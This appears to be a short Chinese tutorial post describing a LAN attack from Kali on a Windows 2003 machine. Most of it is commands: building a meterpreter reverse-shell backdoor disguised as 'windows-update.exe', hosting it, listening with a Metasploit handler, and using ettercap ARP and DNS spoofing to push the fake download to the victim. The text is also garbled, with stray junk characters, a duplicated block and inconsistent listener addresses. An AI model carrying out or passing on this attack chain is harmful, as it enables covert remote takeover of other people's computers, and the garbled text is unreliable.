局域网内,kali对win2003的一次入侵。

spacer.gif用msfpayload生成个有效的WIN可执行后门程序,保存到了/var/www/目录下。: R* B  J# }3 i" j3 b
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.237.129 X >/var/www/windows-update.exe


apache2 start 


使用msfconsole监听端口。- k3 n' N6 U8 y  p

use exploit/multi/handler        
调用payload) a& {* R" k' U$ ~8 i. A. L
set PAYLOAD windows/meterpreter/reverse_tcp
设置模块% p! R( f9 B/ l- l6 ?
set LHOST 192.168.237.132" |% n  }6 K# d% J+ x: Z
设置目标主机" L$ 
使用msfconsole监听端口。- k3 n' N6 U8 y  p

use exploit/multi/handler        
调用payload) a& {* R" k' U$ ~8 i. A. L
set PAYLOAD windows/meterpreter/reverse_tcp
设置模块% p! R( f9 B/ l- l6 ?
set LHOST 192.168.237.132" |% n  }6 K# d% J+ x: Z
设置目标主机" L$ 


exploit9 U2 p- i' }. T$ R; x
启动攻击-



启动ettercap dns 欺骗! i" X& d% I( L; k# ~3 O; r
ettercap -T -q -i eth0 -P dns_spoof -M arp // //( C4 p) i5 X1 \) z$ s# t


被攻击的主机,打开任何网页都会出现这个页面,只要点击一下Download下载,就会下载生成出来的木马后门程序


执行下载的文件。

拿下。

你可能感兴趣的:(windows,程序,start,局域网,主机)